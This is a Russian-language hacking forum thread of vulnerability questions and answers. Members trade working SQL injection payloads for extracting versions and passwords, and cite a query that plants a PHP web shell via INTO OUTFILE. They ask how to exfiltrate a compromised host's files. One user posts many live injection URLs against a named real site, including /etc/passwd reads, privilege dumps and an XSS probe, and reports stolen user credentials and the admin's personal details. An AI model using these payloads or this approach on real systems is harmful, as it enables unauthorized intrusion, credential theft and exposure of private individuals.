Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    вот это:

    Code:
    id=4+or(1,1)=(select+count(0),concat((select+versi on()+from+information_schema.tables+limit+0,1),flo or(rand(0)*2))from(information_schema.tables)group +by+2)
    
    замени на это:

    Code:
    id=(select+1+from+(select+count(0),concat((select+version()+from+information_schema.tables+limit+1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)
    
     
    1 person likes this.
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    где domen.com - сайт, где у тя скуля.

    Так пробовал?
     
  3. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Есть шелл, могу просматривать весь хостинг, по одному файлу много не выкачаю =).
    платформа Linux.
    Можно ли создать фтп пользователя через консоль? если да то как ето сделать?
    Есть ли другие варианты всее от туда стянуть? Bind port to и архивация не подходят!
     
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Зачем тебе FTP? Архивируй через tar и скачивай через шелл.
     
  5. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Архивация не подходит! если больше двух метров архив то ошибка! да и свободного места там практические нет.
     
  6. Quicky

    Quicky New Member

    Joined:
    27 Sep 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Вобще прощу помощи есть база данных от сайта, типа db_user, db_pass, db_host ну и т.д., Движок ДЛЕ, но шелла нет ( Подскажите можно ли как то взломать?
     
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    что взломать?
     
  8. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз
    PHP:
    <?php
    ...
    if(isset(
    $_GET['type']))
    {
        
    $response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'");
        
    $result=mysql_fetch_array($response);
    }
    ...
    ?>
     
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    PHP:
    <?php 
    ... 
    if(isset(
    $_GET['type'])) 

        
    $response=mysql_query("SELECT count(*) FROM news WHERE type='".$_GET['type']."'"); 
        
    $result=mysql_fetch_array($response); 

    ... 
    ?>
     
    1 person likes this.
  10. navai

    navai Member

    Joined:
    24 Dec 2008
    Messages:
    32
    Likes Received:
    15
    Reputations:
    0
    Люди, подскажите, есть доступ к mysql , рутовский как бы.

    но не знаю как залить шелл на сайт, посоветовали через запрос
    select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп';

    но не могу найти папку с правами на залив.

    что делать?
     
    1 person likes this.
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    http://tinyurl.com/yb2gm96
     
  12. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    Почему не логиниться???

    http://www.sflcn.com/admin

    выдрал логин пасс

    Попробуйте плиз. может у меня руки кривые
     
  13. Napas

    Napas Member

    Joined:
    30 Nov 2008
    Messages:
    41
    Likes Received:
    12
    Reputations:
    7
    2 scorpic393
    во-первых, не всегда данные из таблицы подойдут к админке( мб просто данные для входа в нее в другой таблице ) , во-вторых, в данном случае на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd
    такие дела
     
  14. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    90%?)) имхо ты ошибаешся
     
  15. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Вот таким образом выводится нужные мне значения но по одному, меняя лимит

    UNION SELECT * FROM(SELECT * FROM (SELECT NAME_CONST((SELECT password FROM user LIMIT 1), 14)d) as t JOIN(SELECT NAME_CONST((SELECT password FROM user LIMIT 1),14)e)b)a


    Каким образом можно вывести весь список сразу? intooutfile доступ запрещён для этого юзверя.
     
  16. 4p3

    4p3 Elder - Старейшина

    Joined:
    18 Aug 2008
    Messages:
    142
    Likes Received:
    30
    Reputations:
    0
    Нашел сайт с mssql injection. Перебираю таблицы, но с кодировкой что-то не то. Вроде стоит cp1252
    Подставляю это значение в запрос

    Получаю тоже самое.

    Расшифровываю, получаю Запрос_Стадии_Клиент. Пихаю в запрос. Опять та же самая ошибка. Не знаю что делать дальше, помогите, пожалуйста.
     
  17. overcrookd

    overcrookd New Member

    Joined:
    8 Mar 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Здрасти!
    Возникла проблема которую не могу решить даже после прочтения етого треда,множества FAQ по sql inj, sql cheat sheet'ов, мануалов, статей в Хакере и всего подобного.
    Вообщем дело обстоит так:
    inj:

    http://enjoy.md/category.php?id=2%27] http://enjoy.md/category.php?id=2'


    Доступ к БД осуществил, вытянуть удалось лишь логины и пассы пользователей сайта, найти логин и пасс админа в этой БД не удалось. В user_privileges - privilege_type-usage и is_grantable-no:

    http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,grantee,privilege_type,is_grantable%29+from+information_schema.user_privileges--


    load_file выдает пустую страницу(что в hex, что в текст, что с aes_decrypt(aes_encrypt)):

    http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27etc/passwd%27%29,3--+
    http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27home/vhosts/enjoy.md/public_html/index.php%27%29,3--+


    инфа:
    version() - 5.1.37 mysql
    user()- '20121'@'localhost'
    database() - 20121_enjoy
    ещё нашел адмику:
    http://enjoy.md/admin/
    и PMA:
    http://enjoy.md/phpmyadmin

    что интересно, вовсяком случае мне так показалось, так ето вот:

    http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,table_schema+from+information_schema.tables+where+table_name=%27admin%27--

    Не могу понять откуда эти БД взялись если при таком запросе их не видно:

    http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,schema_name+from+information_schema.schemata--

    Подключитьсяк ним никак не могу,есть ли способ и гдеж логин и пасс админа хранится тогда? в PMA и админке обойти авторизацию не вышло.
    Помогите додумать это плз, может совет какой дадите.
    На данный момент приходит в голову лишь кража кукисов, на сайте есть мыло и icq, с их помощью узнал ФИО админа,место работы, сделанные им сайты. Не приятно признавать но не охото мне с кукисами морочиться если есть другие варьянты дайте знать :)
    SiXSS(alert):

    http://enjoy.md/category.php?id=-2/**/union/**/select+1,2,0x3c7363726970743e616c657274282256756c6e65726162696c69747922293b3c2f7363726970743e%20--

    Это может выглядить глупо но всё же:

    http://enjoy.md/category.php?id=6+or+1=if%28load_file%28%27/etc/passwd%27%29+is+not+NULL,1,2%29--+

    значит всё же file_priv=Y? если я чёт намудрил плз исправьте
    доступа к file_priv непсредственно из mysql.users нету,даёт ошибку, как впрочем и к самой БД mysql:
    http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,file_priv+from+mysql.users--

    еще вопрос, почему пишет privilege_type-select is_grantable-no? Я же вовсю им орудую. Или это отнсится лишь к БД и их выбору?

    http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,privilege_type,is_grantable%29+from+information_schema.schema_privileges--

    надеюсь я ниче не перепутал спс!
    кстати: @@datadir - /var/lib/mysql/
    а при ошибке даёт другой путь: /home/vhosts/enjoy.md/public_html/category.php
    т.к. в моём случае заливка шелла не возможна по всей видимость просто прошу обьяснить какой именно путь указать при load_file
     
  18. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    overcrookd в user есть
    login:admin
    password:666 может это и есть то самое?

    п.с ток всеравно логин иле pwd не подходит
     
    #11678 Дирижабль, 9 Mar 2010
    Last edited: 9 Mar 2010
  19. overcrookd

    overcrookd New Member

    Joined:
    8 Mar 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    естессно я первым делом проверил это, увы, это login и pwd для входа на сайт, не админку.
    всеоравно спасибо зв потраченое время :)
     
  20. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    Да так тоже пробовал ничего
     
Thread Status:
Not open for further replies.